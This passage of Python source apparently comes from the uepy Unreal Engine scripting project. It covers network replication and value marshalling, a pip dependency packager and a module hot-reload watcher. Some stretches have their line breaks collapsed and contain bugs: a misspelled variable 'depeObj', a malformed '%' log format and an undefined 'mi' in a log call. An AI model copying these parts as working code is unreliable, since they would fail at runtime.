recipientNetID = self.numToNetID.get(recipientID) if recipientNetID is None: if self.isHost: # No point in deferring the call - we are the host, so maybe it's just a late call for a recently-deceased obj? log('ERROR: ignoring local call to unknown recipient', recipientID) else: # Defer the call til later log('Deferring call to', recipientID, sigDef) self.deferredCalls.setdefault(recipientID, []).append((recipientID, sigDef, mixedSessionID, reliable, bytes(blob))) else: self._ExecuteLocalCall(recipientID, sigDef, mixedSessionID, reliable, blob) def _ExecuteLocalCall(self, recipientID, sigDef, mixedSessionID, reliable, blob): '''Helper used for running local function calls - broken out from _OnBridgeMessage_Call because we need to sometimes defer function calls until after an object has fully replicated. And yes, it is annoying that we have both this and _DoLocalCall.''' recipientNetID = self.numToNetID.get(recipientID) ref = self.objs.get(recipientNetID) if not ref: log('ERROR: non-existent recipient', recipientID, recipientNetID, sigDef) else: obj = ref() if obj: methodName, formatStr = sigDef.split('|') # If a mixed reliability session is active, drop any messages that don't conform, as it indicates they # are out of order/delayed messages that should be ignored if mixedSessionID != 0: expectedID = obj.NRGetMixedReliabilitySessionID(methodName, reliable) if expectedID != mixedSessionID: log('Tossing late mixed mode message for', obj, methodName, '(expected session %d, got %d, reliable:%s)' % expectedID, mixedSessionID, reliable) return args = BinToValues(formatStr, blob) self._DoLocalCall(obj, methodName, args) def _DoLocalCall(self, obj, methodName, args): '''Helper for dispatching an NRCall to a NetReplicated object''' method = getattr(obj, methodName, None) if method is None: log('ERROR: NRCall to', obj, 'but it has no method named', methodName) else: try: method(*args) except: logTB() def NoteObjectReplicated(self, obj): '''Called by 
NetReplicated._NRCheckStart once it has fully replicated on a client. Executes any differed calls, and also informs any objects waiting on this object to replicate that that dependency has been met.''' # Execute any NRCalls that arrived prior to the object being fully replicated netIDNum = self.netIDToNum[obj.nrNetID] for args in self.deferredCalls.pop(netIDNum, []): self._ExecuteLocalCall(*args) # Find all other objects that have been waiting on this object to finish replicating for waiterNetIDNum, attrName in self.dependencyWaiters.pop(netIDNum, []): waiterNetID = self.numToNetID[waiterNetIDNum] waiterRef = self.objs.get(waiterNetID) if waiterRef: waiterObj = waiterRef() if waiterObj: try: waiterObj.nrWaitingDependencies.remove(obj.nrNetID) except ValueError: pass # shouldn't happen but... if attrName: # The waiting object wants a ref of the newly-replicated object stored on it setattr(waiterObj, attrName, obj) if not waiterObj.nrWaitingDependencies: # This object is no longer waiting for any dependencies, so trigger it to possibly finish its own replication now waiterObj._NRCheckStart() def TryConsumeInitialState(self, obj): '''Called on clients by an object's _NRCheckStart as it tries to complete replication. If initial state for the object has been received (via _OnBridgeMessage_ObjInitialState), applies it and returns True, indicating that it can proceed with other initialization steps. Otherwise, returns False, indicating it should try again later. If state is found, the objects repProp values are updated accordingly, and the object's dependency information is set up.''' netIDNum = self.netIDToNum.get(obj.nrNetID) if netIDNum is None: # We don't even have a mapping for this object yet return False # try again later! state = self.unconsumedState.pop(netIDNum, None) if state is None: return False # try again later! # We have this object's state, so set its repProp values - we received just an ordered list of values since we know # the property names already. 
for propName, propValue in zip(obj.nrPropNames, state.propValues): setattr(obj.nr, propName, propValue) # Also resolve or set up tracking of any replicated objects this object depends on waitingFor = [] # netIDs of objs that have not yet arrived for depNetID, attrName in state.dependencies: # See if the object exists and is fully replicated already depNetIDNum = self.netIDToNum.get(depNetID) if depNetIDNum is not None: ref = self.objs.get(depNetID) if ref: depObj = ref() if depObj and depObj.nrOnReplicatedCalled: # Yay, this object has already fully replicated if attrName: setattr(obj, attrName, depeObj) # this object wants a named reference to that other object continue # Either the object doesn't exist yet or it does but it too is still replicating, so we'll wait to list this # object as waiting on it waitingFor.append(depNetID) self.dependencyWaiters.setdefault(depNetIDNum, []).append((netIDNum, attrName)) obj.nrWaitingDependencies = waitingFor return True # you've got your state info, so quit nagging us about it def NetIDNumFromObject(self, obj): '''Helper for marshalling - given a replicated object, return its netID number''' netID = getattr(obj, 'nrNetID', None) assert netID is not None, 'NetIDNumFromObject called on unreplicated object ' + repr(obj) return self.netIDToNum[netID] def ObjectFromNetIDNum(self, netIDNum): '''Inverse of the above; returns None if the object can't be found''' netID = self.numToNetID.get(netIDNum) if netID is None: log('ERROR: bridge failed to find netID for', netIDNum) return None ref = self.objs.get(netID) if ref is None: log('ERROR: bridge failed to find object for', netIDNum, netID) return None return ref() _bridge = NRAppBridge() UNRChannel.SetAppBridge(_bridge) def GetUserID(): '''Public API used by __init__''' return _bridge.channelID class NRWrappedDefault: '''Used for repProps where the application code needs additional annotation information - apps can create custom subclasses instead of providing "bare" default values; 
class NRWrappedDefault:
    '''Used for repProps where the application code needs additional annotation information - apps can create custom
    subclasses instead of providing "bare" default values; NR will just take the .defaultValue member as the default.
    For example:
        class Config(NRWrappedDefault): pass
        repProps = Bag(foo=Config(0), bar=3)'''
    def __init__(self, defaultValue):
        self.defaultValue = defaultValue

class NetReplicated(metaclass=NRTrackerMetaclass):
    '''Mixin class to add to any class (doesn't have to be an actor) that wants to use network replication'''
    # subclasses should declare their own repProps Bag, where each key is the property name (it will later be
    # available in self.nr.<that name>) and the value is the default value for that property. repProps from
    # parent classes are automatically folded into subclasses and do not need to be repeated.
    repProps = Bag()

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.nrNetID = None # unique ID for this object, set by calling bridge.Register.
        self.nrSpawnType = ENRSpawnReplicatedBy.App # who is in charge of replicating this object
        self.isHost = GetWorld().IsServer() # cached here since it doesn't change once code gets this far
        self.nrInitialStateSet = False # on clients, has initial state been received from the host?
        self.nrBeginPlayCalled = False # on all actors, has BeginPlay been called?
        self.nrOnReplicatedCalled = False # on all instances, has OnReplicated been called?
        self.nrDependencies = [] # list of (netID, attrName or '') of replicated objects this object depends on. Only set on host.
        self.nrWaitingDependencies = [] # netIDs of replicated objects this object is waiting on before OnReplicated will be called
        self.nrMixedSessionIDs = {} # method name -> mixed reliability session ID that is currently active

        # Generate the full set of replicated properties and set them to their defaults. By convention, properties
        # are referenced by index in alphabetical order, and no object can have more than 255 replicated properties.
        allProps = Bag()
        for klass in self.__class__.__mro__[::-1]: # reverse order so we start at the top of the MRO list
            allProps.update(**getattr(klass, 'repProps', {}))
        self.nrPropNames = sorted(allProps.keys()) # the official, ordered list of valid replicated property names for this object
        propInfo = {} # prop name -> Bag of info about it
        self.nr = Bag() # At some point we may make this a read-only struct so you have to use NRUpdate
        for i, propName in enumerate(self.nrPropNames):
            v = rawV = allProps[propName]
            if isinstance(v, NRWrappedDefault):
                # unwrap annotated defaults; the raw (wrapped) value is preserved in propInfo below
                v = v.defaultValue
            self.nr[propName] = v
            propInfo[propName] = Bag(index=i, type=type(v), default=v, rawDefault=rawV)
        self.nrPropInfo = propInfo # in case apps need to extract info for other purposes

    def NRRegister(self, netID, spawnType:ENRSpawnReplicatedBy):
        '''Registers this instance so that future messages to the given netID will be sent to it. Must be called in
        all scenarios (from __init__) *except* in NR-spawned instances on clients.'''
        if hasattr(self, 'engineObj') and self.engineObj.IsDefaultObject():
            return # don't register if it's just the CDO
        _bridge.Register(self, netID, spawnType)

    def NRUnregister(self):
        '''Communicates to the replication system that this object will be cleaned up soon. For AActor subclasses,
        this call happens automatically via EndPlay.'''
        _bridge.Unregister(netID=self.nrNetID)

    def NRSetDependencies(self, *depInfos):
        '''Called on the host to declare that this object should not be considered fully replicated on clients until
        all of the listed objects have also fully replicated. Each item can be either a NetReplicated object instance
        or the name of a property on self that holds a ref to a NetReplicated object. In the latter case, once that
        object has replicated to a client, a reference to it will be set on self using that name.'''
        assert self.isHost
        deps = self.nrDependencies = [] # (netID, attrName or ''). These will be used by bridge.SendInitialStateFor.
        for d in depInfos:
            if isinstance(d, str):
                # The name of a property on self that references a NetReplicated object
                ref = getattr(self, d, None)
                assert ref is not None, 'NRSetDependencies cannot find property %r' % d
                assert isinstance(ref, NetReplicated), 'NRSetDependencies cannot depend on a non-replicated object: ' + repr((d, ref))
                deps.append((ref.nrNetID, d))
            else:
                assert isinstance(d, NetReplicated), 'NRSetDependencies cannot depend on a non-replicated object: ' + repr(d)
                deps.append((d.nrNetID, ''))

    def NRStartMixedReliability(self, methodName):
        '''Signals that the application code is going to have some unreliable message calls followed by a terminating
        reliable call. A recurring pattern in multiplayer stuff is to replicate some action from a user that involves
        a lot of updates, such as dragging an object around, and then letting go of it to drop the object somewhere.
        While the drag is happening, you want most players to get updates that that drag is happening, but those
        updates can be throttled & unreliable. When the user releases the object at its final location, you want to
        send a final, reliable message. Since the messages are all sent over UDP, it's possible for one of the
        intermediate messages to show up after the final message, which results in incorrect placement of the object.
        The solution is to call NRStartMixedReliability when the user begins the drag operation; we generate a small
        random ID for the (recipient, method) combination and include it with the messages. The receiving side then
        rejects any unreliable messages that use an invalid (or out of date) ID as a way to detect and prevent the
        above scenario.'''
        sessID = random.randint(1, 255) # 0=no active session, so pick [1..255]
        self.NRCall(ENRWhere.All, '_OnStartMixedReliability', methodName, sessID)

    def _OnStartMixedReliability(self, methodName, sessID):
        '''Receives word that a mixed reliability session (stream of unreliable messages followed by a final,
        reliable message) is starting'''
        self.nrMixedSessionIDs[methodName] = sessID

    def NRGetMixedReliabilitySessionID(self, methodName, reliable):
        '''Used by the bridge to get the current mixed reliability session ID for calls to the given method. Used for
        both sending messages (to know what session ID to include or 0 if none is active) and for receiving messages
        (to detect if an out of order unreliable message is being received after the final reliable message).'''
        sessID = self.nrMixedSessionIDs.get(methodName)
        if sessID is None:
            return 0 # no active session

        # if the message being sent or received is reliable, it signals the end of the mixed reliability session, so we should
        # remove the ID for use in future calls.
        if reliable:
            self.nrMixedSessionIDs.pop(methodName)
            return 0
        return sessID

    def NRCall(self, where:ENRWhere, methodName, *args, reliable=True, maxCallsPerSec=-1):
        '''Performs a replicated call to one or more machines. To send a message to a specific user, use
        ENRWhere.Only(userID).'''
        _bridge.DoCall(self, where, methodName, args, reliable, maxCallsPerSec)

    def NRUpdate(self, where=ENRWhere.All, reliable=True, maxCallsPerSec=-1, **kwargs):
        '''Replicates an update to one or more replicated properties (to all machines by default). As a special case,
        if called from the constructor on the host, where is implicitly set to Local, as a way to override default
        values before the initial state is replicated to other machines.'''
        if where == ENRWhere.NONE or not kwargs:
            return

        # NRUpdate piggybacks on NRCall by sending a parameter that is a string holding a list of repprop indices, then all the
        # values. We put the properties in order by their indices so that the same combination of parameters will use the same sigdef.
        propNames = [] # list of all the properties being updated
        pairs = [] # (propIndex, new value)
        invalidNames = []
        for propName, value in kwargs.items():
            propNames.append(propName)
            try:
                propIndex = self.nrPropNames.index(propName)
                pairs.append((propIndex, value))
            except ValueError:
                invalidNames.append(propName)
                continue
        assert not invalidNames, 'NRUpdate called with one or more invalid property names: ' + repr(invalidNames)

        if not self.nrOnReplicatedCalled:
            # Probably just being called from the constructor on the host to override initial default values
            assert self.isHost # clients shouldn't try to override defaults since their state will be immediately overwritten by the initial state from the host
            assert where in (ENRWhere.All, ENRWhere.Local)
            for k,v in kwargs.items():
                self.nr[k] = v
        elif where == ENRWhere.Local:
            # Special case but common enough that we want to handle it here: it's just a local update, so skip a whole bunch of extra work
            for k,v in kwargs.items():
                setattr(self.nr, k, v)
            self.OnNRUpdate(propNames)
        else:
            indices = []
            values = []
            for propIndex, value in sorted(pairs): # put them in index order
                indices.append(str(propIndex))
                values.append(value)
            indicesStr = '_'.join(indices)
            # At some point we could do like NRCall and combine the indicesStr with the method name so that it can be sent as a sigdef,
            # though it'd require NRCall to handle NRUpdate as a special case.
            self.NRCall(where, '_OnNRUpdate', indicesStr, *values, reliable=reliable, maxCallsPerSec=maxCallsPerSec)

    def _OnNRUpdate(self, indicesStr, *args):
        '''The receiving end of NRUpdate'''
        indices = [int(x) for x in indicesStr.split('_')] # indicesStr is a list of repprop indices in a _-separated string like '2_5_10'
        propNames = []
        for propIndex, value in zip(indices, args):
            # Convert the index to a prop name and update that property to its new value
            propName = self.nrPropNames[propIndex]
            propNames.append(propName)
            setattr(self.nr, propName, value)
        self.OnNRUpdate(propNames)

    def OnNRUpdate(self, modifiedPropNames):
        '''Called anytime an NRUpdate has happened on this object. Subclasses can override. Default implementation
        triggers any OnRep_* methods to be called.'''
        for name in modifiedPropNames:
            handler = getattr(self, 'OnRep_' + name, None)
            if handler:
                try:
                    handler()
                except:
                    logTB()

    def BeginPlay(self):
        '''(Used only on AActor subclasses)'''
        if self.nrSpawnType == ENRSpawnReplicatedBy.Engine and not self.isHost:
            # The NRRegister call made by app code on the client actually had no effect because we didn't know
            # our netGUID yet. But now that we've gotten this far, the engine has assigned us a netGUID, so we
            # can use it to register ourselves using the same unique name that happened for this instance on the host.
            _bridge.Register(self, self._nrDeferredNetID, ENRSpawnReplicatedBy.Engine)

        # The engine will start ticking actors as soon as BeginPlay has been called, but we want to prevent ticks until
        # OnReplicated, so override ticking for now.
        if issubclass(type(self.__class__), PyGlueMetaclass):
            self.engineObj.OverrideTickAllowed(False)
        super().BeginPlay()
        self.nrBeginPlayCalled = True
        self._NRCheckStart()

    def EndPlay(self, reason):
        # Note that EndPlay isn't called for non-engine subclasses, so in that case the app needs to call NRUnregister itself
        # (e.g. from __del__ or something)
        self.NRUnregister()
        super().EndPlay(reason)

    def _NRCheckStart(self):
        '''Called from various points of initialization to decide when it's time to call OnReplicated'''
        if not hasattr(self, 'nrNetID'):
            log('ERROR: object', self, 'failed to call NRRegister')
            return
        if self.nrOnReplicatedCalled:
            log('ERROR: _NRCheckStart called even though OnReplicated has already been called', self, self.nrNetID, Caller())
            return

        if not self.isHost:
            if hasattr(self, 'engineObj') and not self.nrBeginPlayCalled:
                return # we're expecting a BeginPlay call that hasn't happened yet
            if not self.nrInitialStateSet:
                # See if the host has delivered our initial state
                self.nrInitialStateSet = gotIt = _bridge.TryConsumeInitialState(self)
                if not gotIt:
                    return # we'll try again later
                # otherwise, fall thru
            if self.nrWaitingDependencies:
                return # still waiting on one or more dependent objects to fully replicate

        # We're good to go finally!
        self.nrOnReplicatedCalled = True

        # Allow ticking to happen (if the actor doesn't have ticks enabled, it still won't tick - it's now just allowed to tick
        # if it wants to)
        if issubclass(type(self.__class__), PyGlueMetaclass):
            self.engineObj.OverrideTickAllowed(True)

        try:
            self.OnReplicated()
        except:
            logTB()

        if self.isHost:
            # Now trigger replication of our state - we defer to here so that subclasses can do any further setup that they
            # want to do and to give them a chance to declare any replication dependencies
            _bridge.SendInitialStateFor(self)
        else:
            # Now that this object is fully replicated, objects that are depending on it can move forward
            _bridge.NoteObjectReplicated(self)

# Stuff for marshalling objects over the wire. We use a single-character type code and then the data itself in some binary format.
# The typecodes are combined into a format string so that they are not sent over and over, though in retrospect it adds a lot of complexity
# for very little savings. Maybe in v3 we'll get rid of it!
# struct packers for given types
F_Float = struct.Struct('<f') # Note: technically we should use 'd' (8 bytes) because Python's floats seem to be closer to doubles in terms of precision
F_Int = struct.Struct('<i')
F_Short = struct.Struct('<H')
F_FVector = struct.Struct('<fff')
F_FVector2D = struct.Struct('<ff')
F_FRotator = struct.Struct('<fff')
F_FLinearColor = struct.Struct('<ffff')
F_FTransform = struct.Struct('<fffffffff')
F_FQuat = struct.Struct('<ffff')

def ValueToBin(arg):
    '''Given a value to pass over the network, returns (typeCode, binary payload). The typeCode is a single
    character that BinToValues uses to pick the decoder; the payload is the raw bytes to append to the blob.'''
    # Note: if you add more, (a) add it to BinToValues and (b) keep the type code to a single character
    if arg is None: return '0', b''
    if isinstance(arg, bool): return 'B', struct.pack('?', arg) # must be tested before int (bool is a subclass of int)
    if isinstance(arg, float): return 'F', F_Float.pack(arg)
    if isinstance(arg, int): return 'I', F_Int.pack(arg)
    if isinstance(arg, str):
        # BUGFIX: the length prefix used to be len(arg), i.e. the *character* count, but BinToValues slices the blob
        # by *byte* count - any non-ASCII string (where the UTF-8 encoding is longer than the character count) was
        # truncated/corrupted on decode. Encode first and send the byte length. Identical bytes for ASCII strings.
        data = arg.encode('utf8')
        return 'S', F_Short.pack(len(data)) + data
    if isinstance(arg, bytes): return 'y', F_Short.pack(len(arg)) + arg
    if isinstance(arg, FVector): return 'V', F_FVector.pack(*arg)
    if isinstance(arg, FVector2D): return 'v', F_FVector2D.pack(*arg)
    if isinstance(arg, FRotator): return 'R', F_FRotator.pack(*arg)
    if isinstance(arg, FLinearColor): return 'L', F_FLinearColor.pack(*arg)
    if isinstance(arg, type):
        # a class reference - sent by name and resolved via NRTrackerMetaclass.All on the other side
        className = arg.__name__
        data = className.encode('utf8') # same byte-length fix as 'S' above (class names are normally ASCII anyway)
        return 'C', F_Short.pack(len(data)) + data
    if isinstance(arg, FTransform): return 'T', F_FTransform.pack(*arg.GetLocation(), *arg.GetRotation(), *arg.GetScale3D())
    if isinstance(arg, FQuat): return 'Q', F_FQuat.pack(*arg)
    if hasattr(arg, 'nrNetID'):
        # a replicated object - send its netID number; the receiver looks it up in the bridge
        return 'O', F_Int.pack(_bridge.NetIDNumFromObject(arg))
    if isinstance(arg, UObject):
        # The object isn't replicated but it is an engine object, so assume it's an asset that has been loaded
        # by LoadByRef (though we should come up with some way to confirm this assumption), so generate and send a reference
        # path
        ref = GetReferencePath(arg)
        data = ref.encode('utf8') # same byte-length fix as 'S' above
        return 'A', F_Short.pack(len(data)) + data
    assert 0, 'Do not know how to marshall ' + repr((type(arg), arg))

def ValuesToBin(args):
    '''Given a list/tuple of args, returns (formatStr, binary blob) - the concatenated type codes and payloads'''
    formatParts = []
    blobParts = []
    for arg in args:
        f,b = ValueToBin(arg)
        formatParts.append(f)
        blobParts.append(b)
    return ''.join(formatParts), b''.join(blobParts)

def BinToValues(formatStr, blob):
    '''Inverse of ValuesToBin, returns a list of Python objects (or an empty tuple for an empty format string)'''
    if not formatStr:
        return ()
    ret = []
    dataIndex = 0 # where in blob we're reading from next
    for typeCode in formatStr:
        if typeCode == '0':
            ret.append(None)
            # Do not increase dataIndex - 'None' contributes no payload bytes
        elif typeCode == 'B':
            ret.append(blob[dataIndex] != 0)
            dataIndex += 1
        elif typeCode == 'F':
            ret.append(F_Float.unpack_from(blob, dataIndex)[0])
            dataIndex += F_Float.size
        elif typeCode == 'I':
            ret.append(F_Int.unpack_from(blob, dataIndex)[0])
            dataIndex += F_Int.size
        elif typeCode == 'S':
            sLen = F_Short.unpack_from(blob, dataIndex)[0]
            dataIndex += F_Short.size
            ret.append(str(blob[dataIndex:dataIndex+sLen], 'utf8'))
            dataIndex += sLen
        elif typeCode == 'y':
            bLen = F_Short.unpack_from(blob, dataIndex)[0]
            dataIndex += F_Short.size
            ret.append(bytes(blob[dataIndex:dataIndex+bLen]))
            dataIndex += bLen
        elif typeCode == 'V':
            ret.append(FVector(*F_FVector.unpack_from(blob, dataIndex)))
            dataIndex += F_FVector.size
        elif typeCode == 'v':
            ret.append(FVector2D(*F_FVector2D.unpack_from(blob, dataIndex)))
            dataIndex += F_FVector2D.size
        elif typeCode == 'R':
            ret.append(FRotator(*F_FRotator.unpack_from(blob, dataIndex)))
            dataIndex += F_FRotator.size
        elif typeCode == 'L':
            ret.append(FLinearColor(*F_FLinearColor.unpack_from(blob, dataIndex)))
            dataIndex += F_FLinearColor.size
        elif typeCode == 'C':
            sLen = F_Short.unpack_from(blob, dataIndex)[0]
            dataIndex += F_Short.size
            className = str(blob[dataIndex:dataIndex+sLen], 'utf8')
            dataIndex += sLen
            klass = NRTrackerMetaclass.All.get(className)
            assert klass is not None, 'BinToValues unable to find class ' + className
            ret.append(klass)
        elif typeCode == 'T':
            loc = FVector(*F_FVector.unpack_from(blob, dataIndex))
            dataIndex += F_FVector.size
            rot = FRotator(*F_FRotator.unpack_from(blob, dataIndex))
            dataIndex += F_FRotator.size
            scale = FVector(*F_FVector.unpack_from(blob, dataIndex))
            dataIndex += F_FVector.size
            ret.append(FTransform(loc, rot, scale))
        elif typeCode == 'Q':
            ret.append(FQuat(*F_FQuat.unpack_from(blob, dataIndex)))
            dataIndex += F_FQuat.size
        elif typeCode == 'O':
            # a reference to a replicated object
            netIDNum = F_Int.unpack_from(blob, dataIndex)[0]
            dataIndex += F_Int.size
            obj = _bridge.ObjectFromNetIDNum(netIDNum)
            if not obj:
                log('ERROR: BinToValues failed to find object for', repr(netIDNum))
            ret.append(obj)
        elif typeCode == 'A':
            # reference path
            sLen = F_Short.unpack_from(blob, dataIndex)[0]
            dataIndex += F_Short.size
            ret.append(LoadByRef(str(blob[dataIndex:dataIndex+sLen], 'utf8')))
            dataIndex += sLen
        else:
            assert 0, typeCode
    return ret
dfb/uepy
Content/Scripts/uepy/deps.py
'''Manages installable dependencies - used both to package them and at runtime to make them available'''
import os, shutil, zipapp, glob, sys, subprocess

def Package():
    '''Builds deps.pyz from requirements.txt. Called if you run deps.py from the command line, which you should do
    anytime you modify requirements.txt.'''
    outName = 'deps.pyz'
    if os.path.exists(outName):
        os.remove(outName)
    tempDir = 'deps.tmp'
    if os.path.exists(tempDir):
        shutil.rmtree(tempDir)
    os.mkdir(tempDir)
    # FIX: the old 'assert not os.system("pip install ... " + tempDir)' is silently skipped under 'python -O' and
    # runs whatever 'pip' happens to be first on PATH through a shell. check_call raises on failure regardless of
    # optimization flags, avoids the shell entirely, and installs with the same interpreter running this script.
    subprocess.check_call([sys.executable, '-m', 'pip', 'install', '-r', 'requirements.txt', '--target', tempDir])
    # zipapp requires a __main__.py even though this archive is only ever used as a sys.path entry
    with open(os.path.join(tempDir, '__main__.py'), 'w') as f:
        f.write('print("hello")\n')
    zipapp.create_archive(tempDir, outName)
    shutil.rmtree(tempDir)

def Discover(inDir):
    '''Finds any .pyz files in inDir and appends them to sys.path so their contents become importable.
    This should be called on startup by main.py. Returns the list of paths that were added.'''
    libs = glob.glob(os.path.join(inDir, '*.pyz'))
    sys.path.extend(libs)
    return libs

if __name__ == '__main__':
    Package()
dfb/uepy
Content/Scripts/sourcewatcher.py
'''
Provides a development tool that monitors the source files used, reloading stuff when something changes. The developer
provides a "dev module" that is used to set up the work area. Any module can opt-in to be informed about reloads by
implementing any of:

- OnModuleBeforeReload(watcher) - called right before the module is reloaded. Any value returned is state to be
    persisted across the reload.
- OnModuleAfterReload(watcher, state) - called right after the reload; state is whatever was returned from
    OnModuleBeforeReload.

The dev module *must* define a top-level variable called MODULE_SOURCE_ROOTS, a list of directory roots that should be
monitored for file changes (only files actually used matter, but it will restrict its observations to files in
these trees).
'''

import sys, ast, os, importlib, time, traceback

# these get patched
# TODO: use logging code from toolbox.utils
def log(*args):
    print(' '.join(str(x) for x in args))

def logTB():
    for line in traceback.format_exc().split('\n'):
        log(line)

class ImportFinder(ast.NodeVisitor):
    '''AST visitor that collects the names of modules imported at the top level of a source file (imports that
    happen inside function bodies are deliberately ignored).'''
    def __init__(self):
        super().__init__()
        self.funcDepth = 0 # used to track if we're inside a function definition or not
        self.moduleNames = set()

    def visit_FunctionDef(self, node):
        self.funcDepth += 1
        try:
            self.generic_visit(node)
        finally:
            self.funcDepth -= 1

    # 'async def' bodies are function scope too; treat their inner imports the same way
    visit_AsyncFunctionDef = visit_FunctionDef

    def visit_Import(self, node):
        if self.funcDepth > 0:
            # Ignore inner imports as those often create cycles that are too hard to handle properly
            return
        for alias in node.names:
            self.moduleNames.add(alias.name)

    def visit_ImportFrom(self, node):
        if self.funcDepth > 0:
            # Ignore inner imports as those often create cycles that are too hard to handle properly
            return
        # Multiple cases here:
        #   from module import submodule
        #   from module import someVar
        # We assume all are modules and then later when we try to get them out of sys.modules, the ones that were just
        # someVar imports will be skipped over. (Purely-relative imports - 'from . import x' - have node.module == None
        # and are skipped here.)
        if node.module is not None:
            self.moduleNames.add(node.module)
            for alias in node.names:
                self.moduleNames.add(node.module + '.' + alias.name)

    @staticmethod
    def Scan(filename):
        '''Returns a list of module names that the given python file imports. Returns an empty list if the filename
        is None, is not a .py file, or cannot be found; logs and re-raises if the file cannot be parsed.'''
        # FIX: the docstring previously claimed syntax errors also yield an empty list, but the code logs and
        # re-raises on parse failure - the documentation now matches the actual (intentional) behavior.
        if not filename or not filename.lower().endswith('.py') or not os.path.exists(filename):
            return []
        with open(filename) as srcFile: # renamed from 'f' - it was immediately shadowed by the finder below
            src = srcFile.read()
        finder = ImportFinder()
        try:
            finder.visit(ast.parse(src))
        except:
            logTB()
            log('ERROR reading', filename)
            raise
        return list(finder.moduleNames)

class ModuleInfoTracker:
    '''Builds up a dependency graph of modules'''
    class ModuleInfo:
        '''One node in the graph: a single module, its file, and who imports whom'''
        def __init__(self, name, filename, isInSourceRoots):
            self.name = name
            self.iisr = isInSourceRoots
            self.savedState = None # returned from module's OnModuleBeforeReload
            self.imports = [] # ModuleInfo instances for modules this module directly imports
            self.importedBy = set() # ModuleInfo instances for modules that directly import this module
            f = self.filename = filename
            self.isAppSource = f and not f.endswith('.pyd') and isInSourceRoots # True if this module comes from a .py file and that file lives in one of the source roots
            self.UpdateLastMod()

        def UpdateLastMod(self):
            '''Snapshots the file's current mtime so HasChanged can detect later edits'''
            if self.filename and os.path.exists(self.filename):
                self.lastMod = os.path.getmtime(self.filename)

        def IsRoot(self):
            '''Returns True if this module is not imported by anyone else'''
            return not self.importedBy

        def IsLeaf(self):
            '''Returns True if this module imports no modules, or imports only builtin/system modules'''
            for m in self.imports:
                if m.isAppSource:
                    return False
            return True

        def HasChanged(self):
            '''Returns True if the module file on disk has changed'''
            if not self.isAppSource:
                return False
            try:
                curLastMod = os.path.getmtime(self.filename)
                return curLastMod != self.lastMod
            except:
                return False # I guess?
def CallModuleHook(self, name, *args): '''Calls the module's hook if it defines one, returning the result''' m = sys.modules.get(self.name) if m: cb = getattr(m, name, None) if cb: try: return cb(*args) except: logTB() return None def ReloadIfNeeded(self, watcher): reloaded = False if self.needsReload: self.savedState = self.CallModuleHook('OnModuleBeforeReload', watcher) m = sys.modules.get(self.name) if m: m = importlib.reload(m) # don't wrap this in a try/except block - we need an exception to bubble up if something is wrong self.UpdateLastMod() self.needsReload = False # so that other traversals of the dependency tree won't cause it to be loaded yet again reloaded = True self.CallModuleHook('OnModuleAfterReload', watcher, self.savedState) else: log('ERROR: can no longer find module', mi) return reloaded def __init__(self): self.Reset() def Reset(self, newSourceRoots=None): self.modules = {} # module.__name__ -> ModuleInfo self.sourceRoots = (newSourceRoots or [])[:] # we ignore modules not found in these directories or their children def SetSourceRoots(self, roots): self.sourceRoots = [os.path.abspath(x.strip()).lower().replace('\\','/') for x in roots] def _IsInSourceRoots(self, filename): '''Returns True if the given filename is in one of our source roots''' if not filename: return False f = os.path.abspath(filename).lower().strip().replace('\\','/') for src in self.sourceRoots: if f.startswith(src): return True return False def InfoFor(self, module): '''Returns the ModuleInfo for the given module, creating it (and the entries for any dependencies as needed)''' name = module.__name__ mi = self.modules.get(name) if mi is None: filename = getattr(module, '__file__', None) mi = ModuleInfoTracker.ModuleInfo(name, filename, self._IsInSourceRoots(filename)) self.modules[name] = mi # Kick off a check for all modules this module depends on if mi.isAppSource: for otherName in ImportFinder.Scan(mi.filename): otherModule = sys.modules.get(otherName) if not otherModule: 
continue otherMI = self.InfoFor(otherModule) mi.imports.append(otherMI) otherMI.importedBy.add(mi) return mi def MarkReloadModules(self, skipMarking=None): '''Sets .needsReload=T|F on any module based on whether or not each has changed or if any of its dependencies have changed. Returns the list of names of modules that need to be reloaded. if skipMarking is not None, it is a list of module names that can still be scanned but that should not be marked as needing a reload.''' rootMIs = [x for x in self.modules.values() if x.IsRoot()] reloadNames = [] scannedNames = [] for mi in rootMIs: reloadNames.extend(self._MarkReloadTree(mi, skipMarking or [], scannedNames)) return reloadNames # Note: this list may contain duplicates, even though we won't reload a module multiple times in one go def _MarkReloadTree(self, mi, skipMarking, scannedNames): if mi.name not in scannedNames: scannedNames.append(mi.name) reloadNames = [] needsReload = False for otherMI in mi.imports: if otherMI.name not in scannedNames: reloadNames.extend(self._MarkReloadTree(otherMI, skipMarking, scannedNames)) if getattr(otherMI, 'needsReload', False): needsReload = True mi.needsReload = (needsReload or mi.HasChanged()) and mi.name not in skipMarking if mi.needsReload: reloadNames.append(mi.name) return reloadNames def ReloadMarkedModules(self): '''Reload all modules marked by MarkReloadModules. Returns the names of modules that were reloaded, in order.''' # Find all root modules - the ones that are not imported by anyone else reloaded = [] rootMIs = [x for x in self.modules.values() if x.IsRoot()] processedMIs = [] for mi in rootMIs: reloaded.extend(self._ReloadTreeIfNeeded(mi, processedMIs)) return reloaded def _ReloadTreeIfNeeded(self, mi, processedMIs): '''Reloads any dependency modules if they have been marked as needing reload, then reloads this module if it has been flagged too.''' if mi in processedMIs: # prevent infinite recursion if modules depend on each other (e.g. 
via delayed / localfunc import) return [] processedMIs.append(mi) reloaded = [] for otherMI in mi.imports: if otherMI not in processedMIs: reloaded.extend(self._ReloadTreeIfNeeded(otherMI, processedMIs)) if mi.ReloadIfNeeded(self): reloaded.append(mi.name) return reloaded GLOBAL_NAME = '__global_source_watcher__' def GetGlobalInstance(): '''Returns the globally shared source watcher instance if it exists, else None''' return __builtins__.get(GLOBAL_NAME) class SourceWatcher: '''Monitors the source files for one or more classes, triggering an ordered reload when something changes''' def __init__(self, devModuleName='scratchpad', installGlobally=False): self.devModuleName = devModuleName # name of a module we'll import; this is the main module the developer uses as their work environment self.devModule = None # the actual module itself, once we've successfully imported it self.sourceRoots = [] # roots of directory trees that we'll monitor for changes to classes we're watching self.nextFirstLoadTry = 0 self.mit = ModuleInfoTracker() # In some scenarios, it's useful to have a global shared source watcher if installGlobally: if GetGlobalInstance(): log('WARNING: SourceWatcher told to install itself globally but one already exists (will overwrite it)') __builtins__[GLOBAL_NAME] = self def Cleanup(self): '''If the dev module is loaded, tries to call its before reload hook''' if self.devModule: mi = self.mit.InfoFor(self.devModule) mi.CallModuleHook('OnModuleBeforeReload', self) def UpdateSourceRoots(self): if self.devModule: self.sourceRoots = [os.path.abspath(x) for x in getattr(self.devModule, 